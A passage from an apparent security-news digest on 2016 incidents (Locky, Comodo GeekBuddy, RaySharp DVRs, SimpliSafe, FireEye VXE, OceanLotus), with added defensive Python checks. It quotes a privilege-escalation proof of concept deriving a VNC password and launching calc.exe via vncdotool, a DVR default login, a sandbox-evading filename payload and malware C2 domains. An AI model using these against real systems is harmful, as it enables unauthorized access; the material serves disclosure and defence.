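if __name__ == "__main__":
    for path, info in pingback_report(SAMPLE_LOG.splitlines()).items():
        print(path, info)
```

The "verifying pingback from" address is whatever the reflector saw as the source of the pingback.ping call; in a real flood it is the attacker's host or a proxy, which is the most useful lead the victim gets, since the reflecting sites themselves are just badly configured bystanders.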
References:
https://blog.sucuri.net/2016/02/wordpress-sites-leveraged-in-ddos-campaigns.html
https://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html
http://www.securityweek.com/wordpress-sites-used-power-layer-7-ddos-attacks
http://news.softpedia.com/news/26-000-wordpress-sites-leveraged-in-layer-7-ddos-attack-500552.shtml
http://www.tweaktown.com/news/50500/26k-wordpress-sites-attacked-clever-layer-7-ddos-attack/index.html
How Just Opening an MS Word Doc Can Hijack Every File On Your System
19.2.2016 Hacking
If you receive an email masquerading as a company invoice with a Microsoft Word attachment, think twice before opening it.
Doing so could cripple your system and lead to catastrophic data loss.
Attackers are running social-engineering campaigns, using eye-catching subjects in spam emails and compromised websites, to lure victims into installing a destructive ransomware dubbed "Locky" on their systems.
So if you find files with a .locky extension on your network shares, congratulations: you are infected and left with just two options, rebuild from clean backups (or from scratch) or pay the ransom.
Locky is spreading at a rate of about 4,000 new infections per hour, which means roughly 100,000 new infections per day.
Microsoft MACROS are Back
It is hard to digest that in 2016 a single MS Word document can still compromise your system once you enable its macros.
This is where the attackers' tactics show their brilliance.
Locky is being distributed by email, typically an invoice notice delivered through Office 365 or Outlook with a Word attachment that embeds the malicious macro.
The concept of macros dates back to the 1990s. You may remember the message: "Warning: This document contains macros."
Now macros are back, as cyber criminals have found a way to get users to open Microsoft Office documents, especially Word files, and to let the embedded macros run.
How Does Locky Work?
locky-ransomware-derypt
Once the user opens the malicious Word attachment, the document's content appears scrambled and a prompt tells the user to "enable macros" to read it.
Here comes the bad part:
Once the victim enables the (malicious) macro, it downloads an executable from a remote server and runs it.
That executable is the Locky ransomware, which, once started, begins encrypting all the files on the computer and on reachable network shares.
Locky targets nearly all common file types; each encrypted file is renamed with a .locky extension.
Once encryption is complete, the ransomware displays a message instructing the victim to download Tor and visit the attacker's website for further instructions and payment.
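A triage check a mail gateway or analyst can run on such attachments, as an added example that is not from the article: Office Open XML files (.docx, .docm, .xlsm and so on) are ZIP archives in which a VBA project is stored as a part named vbaProject.bin and declared in [Content_Types].xml with the vbaProject content type. Legacy binary .doc files are OLE2 containers and need an OLE parser such as oletools' olevba, which this example does not implement; the two sample documents are constructed here and are not real Locky droppers.

```python
import io
import zipfile

# Added example, not from the article: a mail-gateway style triage check for
# Office attachments. Open XML files are ZIP archives; a VBA project lives in a
# part named vbaProject.bin and is declared in [Content_Types].xml. Legacy .doc
# files are OLE2 containers and need olevba or similar, not covered here.
VBA_PART = "vbaproject.bin"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".xlam", ".pptm", ".potm", ".ppam"}

def inspect_ooxml(data):
    """Return a dict describing the macro indicators in an OOXML document given as bytes."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return {"ooxml": False, "has_vba": False, "vba_parts": [], "declared": False}
    with zf:
        names = zf.namelist()
        vba_parts = [n for n in names if n.rsplit("/", 1)[-1].lower() == VBA_PART]
        declared = False
        if "[Content_Types].xml" in names:
            declared = VBA_CONTENT_TYPE in zf.read("[Content_Types].xml").decode("utf-8", "replace")
    return {"ooxml": True, "has_vba": bool(vba_parts), "vba_parts": vba_parts, "declared": declared}

def attachment_verdict(filename, data):
    """'block' for any OOXML attachment carrying VBA; 'review' when the extension says
    macro-enabled but no VBA part is present, or when the file is not OOXML at all
    (e.g. a legacy .doc that needs olevba); otherwise 'allow'."""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    info = inspect_ooxml(data)
    if info["has_vba"]:
        return "block"
    if ext in MACRO_EXTENSIONS or not info["ooxml"]:
        return "review"
    return "allow"

def build_sample(with_vba):
    """Constructed minimal Word document for the demo; not a real Locky sample."""
    ct = ['<?xml version="1.0" encoding="UTF-8"?>',
          '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
          '<Override PartName="/word/document.xml" ContentType="application/'
          'vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>']
    if with_vba:
        ct.append('<Override PartName="/word/vbaProject.bin" ContentType="%s"/>' % VBA_CONTENT_TYPE)
    ct.append("</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "".join(ct))
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)  # OLE2 magic, stub body
    return buf.getvalue()

if __name__ == "__main__":
    print(attachment_verdict("Invoice_J-98223.docm", build_sample(True)))
    print(attachment_verdict("Invoice.docx", build_sample(False)))
    print(attachment_verdict("Invoice.doc", b"\xd0\xcf\x11\xe0 legacy OLE"))
```

Blocking on the presence of vbaProject.bin rather than on the extension matters because the extension is attacker-controlled; a file named .docx that still carries a VBA part deserves the same treatment as a .docm.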
Locky ransomware asks victims to pay between 0.5 and 2 Bitcoins ($208 to $800) in order to get the decryption key.
Interestingly, Locky's ransom notes are translated into many languages, extending its reach beyond English-speaking victims to maximize the number of casualties.
Locky Encrypts Even Your Network-Based Backup Files
The new ransomware also encrypts network-based backup files, that is, any backup share reachable from the infected machine. So keep copies of your sensitive and important files in offline or third-party storage that is not mounted on your PC, as a backup plan against future ransomware infections.
Researcher Kevin Beaumont, together with Lawrence Abrams of BleepingComputer, first reported the existence of Locky.
To gauge its impact, Kevin intercepted Locky's traffic yesterday and found that the malware is spreading rapidly in the wild.
"I estimate by the end of the day well over 100,000 new endpoints will be infected with Locky, making this a genuine major cybersecurity incident — 3 days in, approximately a quarter of a million PCs will be infected," Kevin said in a blog post.
Statistics from a single hour of infections show that the most affected countries include Germany, the Netherlands, the United States, Croatia, Mali, Saudi Arabia, Mexico, Poland, Argentina and Serbia.
Comodo Internet Security opened your PC to attackers
19.2.2016 Hacking
Comodo Internet Security, in its default configuration, installs an application called GeekBuddy that in turn installs a VNC server, enabled by default.
Google's Project Zero team has found another serious security issue in Comodo's protection software: a VNC server enabled by default with an easily guessed password. It is the second problem found in Comodo products in less than a month; a few days earlier Google researcher Tavis Ormandy discovered a significant flaw in the Chromodo browser, which shipped with the Same Origin Policy (SOP) disabled by default, a setting that puts users at risk.
Whenever users install one of the Comodo solutions (Comodo Anti-Virus, Comodo Firewall or Comodo Internet Security) on a Windows PC, a program called GeekBuddy is installed too. Comodo uses it to provide remote technical support on the machine.
GeekBuddy installs a VNC server that is enabled by default and runs with admin-level privileges. The server listens for incoming connections and, as originally shipped, was not protected by any authentication.
In practice, an attacker could gain full control of the computer running the Comodo software.
“Comodo GeekBuddy, which is bundled with Comodo Anti-Virus, Comodo Firewall, and Comodo Internet Security, runs a passwordless, background VNC server and listens for incoming connections. This can allow for at least local privilege escalation on several platforms. It also may be remotely exploitable via CSRF-like attacks utilizing a modified web-based VNC client (eg. a Java VNC client).” wrote Jeremy Brown in a blog post published on Packet Storm Security.
Comodo later added password protection, but according to Ormandy the generated passwords are predictable.
"This is an obvious and ridiculous local privilege escalation, which apparently Comodo believe they have resolved by generating a password instead of leaving it blank. That is not the case, as the password is simply the first 8 characters of SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks). I imagine Comodo thought nobody would bother checking how they generated the password, because this clearly doesn't prevent the attack they claim it solves," explained Ormandy.
The password can be read from the Windows Registry, or recomputed from disk information, by any logged-in user or by malware running on the machine.
Ormandy also showed how to compute the password from unprivileged disk information and then use it over VNC to launch calc.exe as a proof of concept:
This information is available to unprivileged users, for example, an unprivileged user can launch calc.exe like this:
$ wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks
Caption SerialNumber Signature TotalTracks
VMware, VMware Virtual S SCSI Disk Device -135723213 1997160
$ printf VMware,VMwareVirtualSSCSIDiskDevice-13572321319971601997160 | sha1sum | cut -c-8
7d4612e5
$ printf "key ctrl-esc\ntype calc.exe\nkey enter\n" | vncdotool -p 7d4612e5 -s localhost::5901 -
I'm using vncdotool from here:
https://github.com/sibson/vncdotool
(Note: if there is no SerialNumber field, TotalTracks needs to be repeated twice, I think this is a bug)
Or alternatively you can pull the password out of HKLM, just truncate it to 8 characters(!!!):
$ reg query HKLM\\System\\Software\\COMODO\\CLPS\ 4\\CA /v osInstanceId
HKEY_LOCAL_MACHINE\System\Software\COMODO\CLPS 4\CA
osInstanceId REG_SZ 7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3
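The same derivation as a function, as an added example that is not part of Ormandy's report, so an administrator can check whether a host's GeekBuddy VNC password is recoverable from the fields that `wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks` prints. Two details are inferred from his printf line rather than stated outright: spaces in the Caption are dropped, and when SerialNumber is empty the TotalTracks value is concatenated twice (the bug he notes). For the sample disk fields above his report gives 7d4612e5, the first 8 characters of the stored osInstanceId.

```python
import hashlib

# Added example, not part of Ormandy's report: the GeekBuddy VNC password
# derivation he describes. Spaces in the Caption are stripped and an empty
# SerialNumber is replaced by TotalTracks; both are inferred from his printf line.
def geekbuddy_vnc_password(caption, signature, serial_number, total_tracks):
    """First 8 hex chars of SHA1(Caption + Signature + SerialNumber + TotalTracks)."""
    serial = serial_number or str(total_tracks)   # empty SerialNumber -> TotalTracks repeated
    material = caption.replace(" ", "") + str(signature) + serial + str(total_tracks)
    return hashlib.sha1(material.encode("ascii")).hexdigest()[:8]

def password_from_os_instance_id(os_instance_id):
    """The registry value HKLM\\System\\Software\\COMODO\\CLPS 4\\CA\\osInstanceId holds the
    full SHA-1; the VNC password is just its first 8 characters."""
    return os_instance_id.strip().lower()[:8]

def password_is_derivable(caption, signature, serial_number, total_tracks, os_instance_id):
    """True when the disk-derived value reproduces the stored password, i.e. anyone who
    can run wmic (any local user, or malware) can log in to the VNC server."""
    derived = geekbuddy_vnc_password(caption, signature, serial_number, total_tracks)
    return derived == password_from_os_instance_id(os_instance_id)

if __name__ == "__main__":
    # sample disk fields from Ormandy's VMware test machine
    disk = ("VMware, VMware Virtual S SCSI Disk Device", -135723213, "", 1997160)
    print("derived VNC password:", geekbuddy_vnc_password(*disk))
    print("matches registry value:",
          password_is_derivable(*disk, "7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3"))
```

The check is only meaningful on an unpatched GeekBuddy; after the 4.25.380415.167 fix the question to ask is whether the VNC listener is still reachable at all, not how its password is built.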
Ormandy reported the issue to Comodo on January 19; on February 10 the company released a fix in GeekBuddy version 4.25.380415.167.
Tens of thousands of DVRs exposed on Internet with Hardcoded Passwords
19.2.2016 Hacking
According to a report published by Risk Based Security, tens of thousands of DVRs are exposed on the Internet with a hardcoded password.
According to a report published by Risk Based Security (RBS), the firmware of DVRs manufactured by China-based Zhuhai RaySharp contains hardcoded credentials that a remote attacker can use to take control of the devices.
"DVRs based on the Zhuhai RaySharp DVR firmware provide a web-based management interface for users to manage the device, view feeds from connected surveillance cameras, and use the PTZ (Pan-Tilt-Zoom) controls. It was found that the interface contains hardcoded credentials that allow anyone to easily access the device," states the report.
The digital video recorders include a web interface for managing the device, viewing recorded video and controlling the connected surveillance cameras.
Access is trivial: all the devices share the same username, "root", and password, "519070".
Tens of thousands of such DVRs are reachable from the Internet: using Shodan, the Risk Based Security researchers found between 36,000 and 46,000 of them online, most located in the US.
The problem is much broader than one brand: according to the experts, many other vendors worldwide (e.g. Defender, Lorex, KGuard Security, König, Swann and COP USA) sell DVRs running firmware affected by this vulnerability (CVE-2015-8286).
Risk Based Security reported the vulnerability to US-CERT in September 2015, which notified the affected vendors in October. Some vendors are working on their own patches, but many still have not fixed the problem, and RaySharp itself has yet to release a fix.
Hardcoded credentials are a common problem in IoT devices, and such poorly designed devices are easy prey for attackers. Until fixed firmware arrives, the only practical mitigation is to keep the web interface off the public Internet, behind a firewall or VPN, and to check your own address space for exposed interfaces with a Shodan or port-scan query.
Using SimpliSafe Home Security? — You're Screwed! It's Easy to Hack & Can't be Patched
18.2.2016 Vulnerebility
If you are using a SimpliSafe wireless home alarm system to improve your home security the smart way, throw it out and buy a new one. It is useless.
So-called "smart" technology, designed to make your home safer, is actually opening your doors to hackers. The latest example is the SimpliSafe alarm.
SimpliSafe wireless home alarm systems, used by more than 300,000 customers in the United States, are trivially easy to hack, allowing an attacker to gain full access to the alarm and disable it, facilitating unauthorized entry and theft.
…and the most striking part: it cannot be patched!
As the Internet of Things (IoT) is growing at a great pace, it continues to widen the attack surface at the same time.
Just last month, a similar flaw was found in Ring, a smart doorbell that connects to the user's home WiFi network, which allowed researchers to extract the homeowner's WiFi password.
How to Hack SimpliSafe Alarms?
According to Andrew Zonenberg, senior security consultant at IOActive, who discovered the weakness, anyone with basic hardware and software costing between $50 and $250 can harvest the alarm's PIN and turn the alarm off from up to 200 yards (about 180 meters) away.
Since the SimpliSafe alarm uses unencrypted radio communications, a thief loitering near a home with some radio equipment can sniff the unencrypted PIN messages sent from the keypad to the base station when the owner disarms the alarm.
The attacker's device records the PIN in its microcontroller's memory (RAM) and can later replay it to disarm the alarm and burgle the house while the owners are away.
Moreover, the attacker can also send spoofed sensor readings, such as "back door closed", to fool the alarm into believing no break-in is taking place.
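Why a captured frame is enough, and what "adding cryptography to the protocol" buys, as an added example that is neither IOActive's code nor SimpliSafe's real radio protocol: a toy keypad and base station in two versions. The plain pair behaves as described above (PIN in the clear, no freshness), so a recorded disarm frame replays. The secure pair never transmits the PIN; it sends a monotonically increasing counter and an HMAC over counter, command and PIN under a per-keypad key shared at pairing time, so a sniffed frame can be neither replayed nor forged. The key and PIN values are constructed for the demo.

```python
import hashlib
import hmac
import struct

# Added example, not IOActive's code and not SimpliSafe's real protocol: a toy
# keypad/base-station model, first as the article describes it (plaintext PIN,
# no freshness), then hardened with a counter and an HMAC under a pairing key.
DISARM = b"DISARM"
TAG_LEN = 32  # HMAC-SHA256 digest size

class PlainKeypad:
    def disarm(self, pin):
        return DISARM + b":" + pin                 # exactly what a sniffer captures

class PlainBase:
    def __init__(self, pin):
        self.pin = pin
    def receive(self, frame):
        return frame == DISARM + b":" + self.pin   # no freshness check: replay succeeds

class SecureKeypad:
    def __init__(self, key):
        self.key, self.counter = key, 0
    def disarm(self, pin):
        self.counter += 1                          # must persist across power loss in real hardware
        ctr = struct.pack(">I", self.counter)
        tag = hmac.new(self.key, ctr + DISARM + pin, hashlib.sha256).digest()
        return ctr + tag                           # the PIN itself never goes over the air

class SecureBase:
    def __init__(self, key, pin):
        self.key, self.pin, self.last_counter = key, pin, 0
    def receive(self, frame):
        if len(frame) != 4 + TAG_LEN:
            return False
        counter = struct.unpack(">I", frame[:4])[0]
        if counter <= self.last_counter:           # already seen or stale: a replay
            return False
        expected = hmac.new(self.key, frame[:4] + DISARM + self.pin, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, frame[4:]):
            return False                           # wrong PIN or wrong key: a forgery
        self.last_counter = counter
        return True

def demo(pin=b"1234", key=bytes(range(32))):
    """Run the sniff-and-replay scenario against both design variants."""
    plain_keypad, plain_base = PlainKeypad(), PlainBase(pin)
    captured = plain_keypad.disarm(pin)            # attacker records the owner disarming
    plain_live = plain_base.receive(captured)
    plain_replay = plain_base.receive(captured)    # attacker replays it later
    sec_keypad, sec_base = SecureKeypad(key), SecureBase(key, pin)
    captured = sec_keypad.disarm(pin)
    sec_live = sec_base.receive(captured)
    sec_replay = sec_base.receive(captured)
    forged = struct.pack(">I", 99) + b"\x00" * TAG_LEN   # attacker without the key
    sec_forge = sec_base.receive(forged)
    sec_next = sec_base.receive(sec_keypad.disarm(pin))  # the owner's next press still works
    return {"plain_live": plain_live, "plain_replay": plain_replay,
            "secure_live": sec_live, "secure_replay": sec_replay,
            "secure_forge": sec_forge, "secure_next": sec_next}

if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:14s} {ok}")
```

The counter is what defeats replay and the MAC is what defeats forgery; neither helps against the spoofed sensor readings mentioned above unless the sensors are keyed the same way, and none of it can be retrofitted to a one-time-programmable microcontroller, which is the point of the next section.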
Video Demonstration of the Hack
A video demonstration shows the hack at work.
"Unfortunately, there's no easy workaround for the issue since the keypad happily sends unencrypted PINs out to anyone listening," Zonenberg explains.
Here's Why Your Smart Alarms are Unpatchable
Besides using an unencrypted channel, SimpliSafe built its alarm around a one-time-programmable microcontroller, leaving no option for an over-the-air firmware update.
"Normally, the vendor would fix the vulnerability in a new firmware version by adding cryptography to the protocol," Zonenberg adds. But, "this isn't an option for the affected SimpliSafe products because the microcontrollers in currently shipped hardware are one-time programmable."
This means no patch is coming for your SimpliSafe alarm, leaving you, along with over 300,000 other homeowners, with no solution other than to stop using SimpliSafe and buy another wireless alarm system.
Zonenberg said he has contacted the Boston-based vendor several times since September 2015, but the manufacturer has not responded, so he finally reported the issue to US-CERT.
VXE Flaw allowed threats to bypass FireEye detection engine
18.2.2016 Vulnerebility
Researchers at Blue Frost Security discovered a flaw in the FireEye Virtual Execution Engine (VXE) that let an attacker completely bypass virtualization-based dynamic analysis and get malware whitelisted.
Security researchers at Blue Frost Security found a high-severity vulnerability in FireEye products that allowed an attacker to bypass the company's detection engine and temporarily whitelist malware.
The experts reported the flaw to FireEye in September 2015; the company promptly patched it and released an update of the FireEye Operating System (FEOS). FireEye also asked Blue Frost to wait until mid-February to disclose the flaw, because many customers had not yet applied the update.
The flaw resides in FireEye's Virtual Execution Engine (VXE), a crucial component that performs dynamic analysis of files. The component is used in several products of the FireEye portfolio, including Network Security (NX), Email Security (EX), Malware Analysis (AX) and File Content Security (FX).
Whenever the VXE analyzes a Windows binary, it copies it into a virtual machine under the name "malware.exe". Before the file is executed, the engine runs a batch script that copies the binary to a temporary location and renames it to its original filename.
The experts discovered that the software does not sanitize the original filename, so an attacker can embed Windows environment variables in it, and the batch script expands them.
“FireEye is employing the Virtual Execution Engine (VXE) to perform a dynamic analysis. In order to analyze a binary, it is first placed inside a virtual machine. A Windows batch script is then used to copy the binary to a temporary location within the virtual machine, renaming it from “malware.exe” to its original file name.
copy malware.exe "%temp%\fire_in_the_eye.exe"
No further sanitization of the original filename is happening which allows an attacker to use Windows environment variables inside the original filename which are resolved inside the batch script. Needless to say this can easily lead to an invalid filename, letting the copy operation fail.” states the security advisory from Blue Frost.
“Let’s take the filename FOO%temp%BAR.exe which results in:
copy malware.exe "%temp%\FOOC:\Users\admin\AppData\Local\TempBAR.exe"
The filename, directory name, or volume label syntax is incorrect.
0 file(s) copied.
The batch script continues and tries to execute the binary under its new name which of course will fail as well because it does not exist.”
The batch script then attempts to execute the file in the virtual machine while monitoring for malicious behavior, but since the copy failed there is nothing to run, and the engine never observes any malicious activity. At that point the VXE considers the file clean and adds its MD5 hash to a whitelist of already-analyzed binaries, which are not re-analyzed until the list is wiped the next day.
"Once a binary was analyzed and did not show any malicious behavior, its MD5 hash is added to an internal list of binaries already analyzed. If a future binary which is to be analyzed matches an MD5 hash in this list, the analysis will be skipped for that file. The MD5 hash will stay in the white list until it is wiped after a day," Blue Frost Security said in its advisory. "This effectively allows an attacker to whitelist a binary once and then use it with an arbitrary file name in a following attack. The initial binary with the environment variable embedded in its filename could e.g. be hidden in a ZIP file together with several other benign files and sent to an unsuspicious email address. Once this ZIP file was downloaded or sent via email a single time, the MD5 hash of the embedded malware would be whitelisted and the binary could then be used with an arbitrary file name without detection."
FireEye, one of the most important firms in the security industry, immediately developed fixes (FX 7.5.1, AX 7.7.0, NX 7.6.1 and EX 7.6.2), which have already been released.
"FireEye encourages all customers to update their systems to the latest released version where noted below. FireEye has issued maintenance releases and fixes for all security issues contained within this advisory," states the company.
FireEye said it has not seen any active exploitation of the evasion technique against its customers.
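The two halves of the bug together, as an added example that is neither Blue Frost's nor FireEye's code: a toy model of the analysis flow the advisory describes. It simulates cmd.exe's %VAR% expansion with a constructed environment, shows why the advisory's FOO%temp%BAR.exe name makes the copy fail, and then runs the MD5 whitelist logic twice: the original behaviour, where a sample that never ran is recorded as clean and is skipped under any name afterwards, and a fail-closed variant that refuses a verdict when the copy fails. The observed_malicious flag stands in for whatever the real sandbox would see if the sample actually executed.

```python
import hashlib
import re

# Added example, not Blue Frost's or FireEye's code: a toy model of the VXE flow
# from the advisory. cmd.exe expansion is simulated with a constructed environment;
# `observed_malicious` stands in for what the real sandbox would see if the sample ran.
VM_ENV = {"temp": r"C:\Users\admin\AppData\Local\Temp"}   # constructed VM environment
ENV_REF = re.compile(r"%([^%]+)%")
NAME_ILLEGAL = set('<>:"/\\|?*')                          # cannot appear in one path component

def expand_cmd(name, env=VM_ENV):
    """Mimic cmd.exe expansion of %VAR% in a batch script (case-insensitive lookup;
    unknown variables are left as written)."""
    return ENV_REF.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), name)

def copy_would_fail(original_name, env=VM_ENV):
    """`copy malware.exe "%temp%\\<original_name>"` fails when the expanded name contains
    characters that are illegal inside a file name, as with FOO%temp%BAR.exe."""
    return any(c in NAME_ILLEGAL for c in expand_cmd(original_name, env))

class VxeModel:
    def __init__(self, fail_closed=False):
        self.whitelist = set()      # MD5s judged clean (the real product wipes this daily)
        self.fail_closed = fail_closed

    def analyze(self, original_name, content, observed_malicious):
        """Returns 'skipped-whitelisted', 'clean', 'malicious' or 'error'."""
        md5 = hashlib.md5(content).hexdigest()
        if md5 in self.whitelist:
            return "skipped-whitelisted"
        if copy_would_fail(original_name):
            if self.fail_closed:
                return "error"      # nothing ran, so no verdict and no whitelist entry
            verdict = "clean"       # original behaviour: nothing ran, nothing seen
        else:
            verdict = "malicious" if observed_malicious else "clean"
        if verdict == "clean":
            self.whitelist.add(md5)
        return verdict

def demo():
    payload = b"MZ" + b"\x90" * 64 + b"constructed stand-in for a malicious PE"
    original, fixed = VxeModel(), VxeModel(fail_closed=True)
    return {
        "expanded": expand_cmd("FOO%temp%BAR.exe"),
        "first_pass": original.analyze("FOO%temp%BAR.exe", payload, observed_malicious=True),
        "second_pass": original.analyze("invoice.exe", payload, observed_malicious=True),
        "fixed_first": fixed.analyze("FOO%temp%BAR.exe", payload, observed_malicious=True),
        "fixed_second": fixed.analyze("invoice.exe", payload, observed_malicious=True),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:13s} {value}")
```

The lesson generalises beyond filenames: any analysis step that can fail before the sample executes must be treated as "no result", never as "no malicious behaviour", or the cache built on top of it becomes an allowlist the attacker can populate.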
A sophisticated variant of OceanLotus trojan targets OS X systems
18.2.2016 Apple
In May 2015, the Chinese security firm Qihoo 360 published a report on a Trojan called OceanLotus that had been used since 2012 in APT attacks against targets in China.
The OceanLotus APT attacks focused on government organizations, research institutes, maritime agencies and companies in other sectors.
At the time, four different versions of the Trojan were found, one of them specifically designed to target OS X systems.
AlienVault analyzed two of the OS X samples (one of them probably an early version). A more recent variant, uploaded to VirusTotal on February 8, had a zero detection rate at the time; as I write this post, the OceanLotus sample is detected by 11 of 55 antivirus engines, including ESET-NOD32, Ikarus, F-Secure and Bitdefender.
As the title of AlienVault's analysis says, the Trojan is disguised as an Adobe Flash Player update.
The developers used XOR-based obfuscation, which makes the malware harder to detect. The OS X commands and APIs it uses show that the developers are familiar with OS X, which makes sense given that OceanLotus has a version built specifically for OS X.
Once a system is infected, OceanLotus installs an agent that tries to contact its command-and-control (C&C) servers. After connecting, the Trojan collects information from the infected system, including the device name, the username and a unique ID, and determines whether the victim has root privileges.
The malware can perform many tasks, including opening application bundles, returning information about a file or path, listing recently opened documents, reporting active windows, capturing screenshots, downloading files from a URL, executing files, killing processes and deleting files.
"The OS X version of OceanLotus is clearly a mature piece of malware that is written specifically for OS X. The use of OS X specific commands and APIs is evidence that the authors are intimately familiar with the operating system and have spent quite a bit of time customizing it for the OS X environment. Similar to other advanced malware, the use of obfuscation and indirection within the binary are an indication that the authors want to protect their work, make it difficult for others to reverse engineer, and reduce detection rates. The fact that VirusTotal still shows a zero detection rate for this threat shows they are succeeding at the latter," states the analysis published by AlienVault.
The indicators of compromise (IOCs) from the AlienVault report follow:
Hashes:
ROL3 encoded .en_icon: 9cf500e1149992baae53caee89df456de54689caf5a1bc25750eb22c5eca1cce
ROL3 decoded .en_icon: 3d974c08c6e376f40118c3c2fa0af87fdb9a6147c877ef0e16adad12ad0ee43a
ROL3 encoded .DS_Stores: 4c59c448c3991bd4c6d5a9534835a05dc00b1b6032f89ffdd4a9c294d0184e3b
ROL3 decoded .DS_Stores: 987680637f31c3fc75c5d2796af84c852f546d654def35901675784fffc07e5d
EmptyApplication: 12f941f43b5aba416cbccabf71bce2488a7e642b90a3a1cb0e4c75525abb2888
App bundle
83cd03d4190ad7dd122de96d2cc1e29642ffc34c2a836dbc0e1b03e3b3b55cff
Another older variant that only communicates with the unencrypted C2:
a3b568fe2154305b3caa1d9a3c42360eacfc13335aee10ac50ef4598e33eea07
C2s:
kiifd[.]pozon7[.]net
shop[.]ownpro[.]net
pad[.]werzo[.]net
Dropped Files:
/Library/.SystemPreferences/.prev/.ver.txt or ~/Library/.SystemPreferences/.prev/.ver.txt
/Library/Logs/.Logs/corevideosd or ~/Library/Logs/.Logs/corevideosd
/Library/LaunchAgents/com.google.plugins.plist or ~/Library/LaunchAgents/com.google.plugins.plist
/Library/Parallels/.cfg or ~/Library/Parallels/.cfg
/tmp/crunzip.temp.XXXXXX (passed to mktemp(), so the actual file will vary)
~/Library/Preferences/.fDTYuRs
/Library/Hash/.Hashtag/.hash (or ~/Library/Hash/.Hashtag/.hash)
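A host check built from the indicators above, as an added example that is not AlienVault's code: it reports which of the listed dropped-file paths exist under the given roots (by default "/" and the current user's home, covering both the system and per-user variants), which files under a directory match the listed SHA-256 hashes, and refangs the C2 names for DNS or proxy log searches. The temporary-file pattern is checked with a glob because its suffix is generated by mktemp().

```python
import glob
import hashlib
import os

# Added example, not AlienVault's code: a host check assembled from the IOCs above.
IOC_SHA256 = {
    "9cf500e1149992baae53caee89df456de54689caf5a1bc25750eb22c5eca1cce": "ROL3 encoded .en_icon",
    "3d974c08c6e376f40118c3c2fa0af87fdb9a6147c877ef0e16adad12ad0ee43a": "ROL3 decoded .en_icon",
    "4c59c448c3991bd4c6d5a9534835a05dc00b1b6032f89ffdd4a9c294d0184e3b": "ROL3 encoded .DS_Stores",
    "987680637f31c3fc75c5d2796af84c852f546d654def35901675784fffc07e5d": "ROL3 decoded .DS_Stores",
    "12f941f43b5aba416cbccabf71bce2488a7e642b90a3a1cb0e4c75525abb2888": "EmptyApplication",
    "83cd03d4190ad7dd122de96d2cc1e29642ffc34c2a836dbc0e1b03e3b3b55cff": "App bundle",
    "a3b568fe2154305b3caa1d9a3c42360eacfc13335aee10ac50ef4598e33eea07": "older variant (unencrypted C2)",
}
DROPPED_RELATIVE = [                      # checked under "/" and under the user's home
    "Library/.SystemPreferences/.prev/.ver.txt",
    "Library/Logs/.Logs/corevideosd",
    "Library/LaunchAgents/com.google.plugins.plist",
    "Library/Parallels/.cfg",
    "Library/Preferences/.fDTYuRs",
    "Library/Hash/.Hashtag/.hash",
]
TEMP_GLOB = "/tmp/crunzip.temp.*"         # suffix comes from mktemp(), so match by pattern
C2_DEFANGED = ["kiifd[.]pozon7[.]net", "shop[.]ownpro[.]net", "pad[.]werzo[.]net"]

def refang(indicator):
    """Turn a defanged name back into one usable in a log search."""
    return indicator.replace("[.]", ".")

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def find_dropped(roots, temp_glob=TEMP_GLOB):
    """IOC paths that exist (file or symlink) under any of `roots`, plus temp-file matches."""
    hits = [os.path.join(root, rel) for root in roots for rel in DROPPED_RELATIVE
            if os.path.lexists(os.path.join(root, rel))]
    return hits + glob.glob(temp_glob)

def find_by_hash(directory, hashes=IOC_SHA256):
    """Walk `directory`; return {path: label} for files whose SHA-256 is an indicator."""
    matches = {}
    for dirpath, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_of(path)
            except OSError:
                continue                  # unreadable or vanished; skip, don't abort the scan
            if digest in hashes:
                matches[path] = hashes[digest]
    return matches

def run(roots=("/", os.path.expanduser("~")), scan_dir=None):
    """Full check: dropped paths, hash matches under `scan_dir` if given, and refanged C2s."""
    return {"dropped_files": find_dropped(roots),
            "hash_matches": find_by_hash(scan_dir) if scan_dir else {},
            "c2_domains": [refang(d) for d in C2_DEFANGED]}

if __name__ == "__main__":
    for key, value in run(scan_dir=os.path.expanduser("~/Downloads")).items():
        print(key, value)
```

A hit on the LaunchAgents plist is the most useful of the path indicators, since it is the persistence mechanism; the hash list only catches the exact samples AlienVault saw, so treat an absence of hash matches as inconclusive.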
Hollywood Hospital Pays $17,000 Ransom to Hacker for Unlocking Medical Records
18.2.2016 Hacking
Ransomware has turned into a noxious game that lets hackers get paid effortlessly.
This time the victim was the Los Angeles-based Hollywood Presbyterian Medical Center, whose sensitive files were encrypted by attackers who demanded US$17,000 to restore access to the compromised data.
The damage from the compromised files can be summarized as:
Compromised email
Lockout from the Electronic Medical Record (EMR) system
Encrypted patient data
Inability to carry out CT scans on admitted patients
High-risk patients transferred to nearby hospitals
...and further, unexplained effects.
The hospital confirmed that the ransomware had hit its core systems a week earlier, and the situation had steadily grown worse.
Hospital End up Paying $17,000
As the situation spiraled out of control, the hospital paid 40 Bitcoins (roughly US$17,000) to the criminals to obtain the decryption key and resume medical operations.
